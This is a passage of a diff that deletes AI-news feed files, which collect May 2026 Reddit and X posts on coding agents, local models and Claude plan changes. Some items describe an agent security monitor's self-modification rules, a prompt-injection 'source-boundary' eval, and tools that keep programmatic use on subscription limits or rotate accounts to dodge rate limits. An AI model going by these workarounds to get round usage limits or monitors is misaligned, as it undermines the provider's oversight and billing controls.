Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually (\"can you add X\", \"why is this breaking\", \"clean this up\"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like \"implement\", \"build\", \"add\", \"fix\", \"change\", or \"improve\" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage…", - "category": "ai_tools" - }, - { - "title": "What MCP servers are you guys using for persistent memory?", - "url": "https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.96, - "date": "2026-05-12T03:49:32.000Z", - "summary": "Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? 
Just trying to see what the standard stack is for keeping claude grounded.", - "category": "ai_tools" - }, - { - "title": "I realized character consistency breaks after the first few images", - "url": "https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.9, - "date": "2026-05-12T13:49:35.000Z", - "summary": "I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. 
It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever…", - "category": "creative_tools" - }, - { - "title": "My First Official AI Research Paper Accepted on SSRN", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-12T23:04:46.000Z", - "summary": "https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. 
You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059)", - "category": "ai_models" - }, - { - "title": "What solutions are you using to boost TPS and Context Window?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-12T20:42:32.000Z", - "summary": "**Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work?", - "category": "ai_models" - }, - { - "title": "How many years do you think we are from making feature films at home?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-12T20:36:10.000Z", - "summary": "What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. 
Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari…", - "category": "creative_tools" - }, - { - "title": "Chroma1-HD Character Transfer with Flux.2 Dev", - "url": "https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-12T20:21:51.000Z", - "summary": "[Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). 
Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\\_flux\\_character\\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they…", - "category": "creative_tools" - }, - { - "title": "Vulkan or CPU llama cpp backend for local llm for coding/code assist", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T19:00:39.000Z", - "summary": "Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). 
Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-13.json b/data/news-feed-2026-05-13.json deleted file mode 100644 index dae933f..0000000 --- a/data/news-feed-2026-05-13.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.782Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-13", - "article_count": 15, - "archived_story_count": 656, - "articles": [ - { - "title": "I'm cooked. Anthropic just split \"--print\" mode to $/mo credits", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T22:16:44.000Z", - "summary": "So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \\[tickets + agents + hooks + executors -> \"claude -p\" -> hands-free always-on productivity\\]. 
Now that Anthropic has announced that \"claude --print\" will, from June 15 forward, be considered \"programmatic\" SDK usage, all jobs launched using \"--print\" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below!", - "category": "ai_tools" - }, - { - "title": "TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T13:00:32.000Z", - "summary": "Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. 
You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat…", - "category": "ai_models" - }, - { - "title": "Cross devices agent memory and context management?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T09:49:46.000Z", - "summary": "Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type \"codex\" or \"claude\". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest \"CHANGELOG\" markdown file, or maybe even \"HANDOFF.md\" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. 
I just wanna learn how others (10x devs) tackling such problem/worklow?", - "category": "ai_tools" - }, - { - "title": "The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T08:31:25.000Z", - "summary": "Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \\~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. 
https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't \"generate me a landing page.\" It's sustained autonomous development where the model maintains context across sessions, manages…", - "category": "ai_models" - }, - { - "title": "Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-13T01:39:12.000Z", - "summary": "* NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops \"in your system prompt\" from the \"default to forking\" reference so the rule applies generically to parent guidance. 
* Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa…", - "category": "ai_tools" - }, - { - "title": "Context Is Not Control, a source-boundary eval for LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-13T20:03:41.000Z", - "summary": "I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \\* evidence \\* user framing \\* quoted material \\* source text \\* instruction-like contamination \\* unsupported claims \\* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that…", - "category": "ai_models" - }, - { - "title": "What kinds of models are people training with document data? 
[P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T18:52:46.000Z", - "summary": "We've helped some folks with synthetic data for a number of different projects and some of them for \"document data\". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-)", - "category": "ai_research" - }, - { - "title": "A new monthly Agent SDK credit for Claude plans", - "url": "https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T17:30:36.000Z", - "summary": "Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. 
The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr…", - "category": "ai_tools" - }, - { - "title": "Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-05-13T10:24:41.000Z", - "summary": "Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. 
Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html)", - "category": "ai_tools" - }, - { - "title": "A fully autonomous browser runtime for any AI agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T10:09:06.000Z", - "summary": "Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. 
Please take a look and let me know:", - "category": "ai_tools" - }, - { - "title": "I built a native macOS app to manage Claude Code sessions, accounts, and projects", - "url": "https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T08:42:52.000Z", - "summary": "I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. 
Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features!", - "category": "ai_tools" - }, - { - "title": "Fast mode for Claude Opus 4.7 is now available on the api.", - "url": "https://x.com/DailyXplorer/status/2054464151234228372", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-13T07:29:58.000Z", - "summary": "Fast mode for Claude Opus 4.7 is now available on the api.", - "category": "ai_models" - }, - { - "title": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…", - "url": "https://x.com/jiaweihq/status/2054463419722707134", - "source": "X search / Agent workflows", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-13T07:27:04.000Z", - "summary": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. 
So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth", - "category": "ai_agents" - }, - { - "title": "Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-13T03:56:36.000Z", - "summary": "Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of \"AI did the work for me\". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. 
If you've benchmarked Qwen3 tool-calling fail…", - "category": "ai_models" - }, - { - "title": "I built a local GUI + AI builder for creating ComfyUI custom node packs", - "url": "https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-13T00:48:52.000Z", - "summary": "I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next?", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-14.json b/data/news-feed-2026-05-14.json deleted file mode 100644 index ce170a1..0000000 --- a/data/news-feed-2026-05-14.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.946Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-14", - "article_count": 15, - "archived_story_count": 592, - "articles": [ - { - "title": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", - "url": "https://x.com/OpenAIDevs/status/2051725072873001338", - "source": 
"X / @openaidevs", - "tags": [ - "api_update", - "product_launch", - "open_source", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "open_source", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-05T18:05:51.000Z", - "summary": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", - "category": "ai_tools" - }, - { - "title": "Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T06:13:22.000Z", - "summary": "Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. 
[github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions!", - "category": "ai_models" - }, - { - "title": "Simpler self hosted alt to Open WebUI", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T01:05:45.000Z", - "summary": "Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that \"just works\". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome!", - "category": "ai_models" - }, - { - "title": "My AI runs 24/7 on Claude Code without -p. 
Here's the hook to do it yourself.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T00:42:20.000Z", - "summary": "**Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \\o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. 
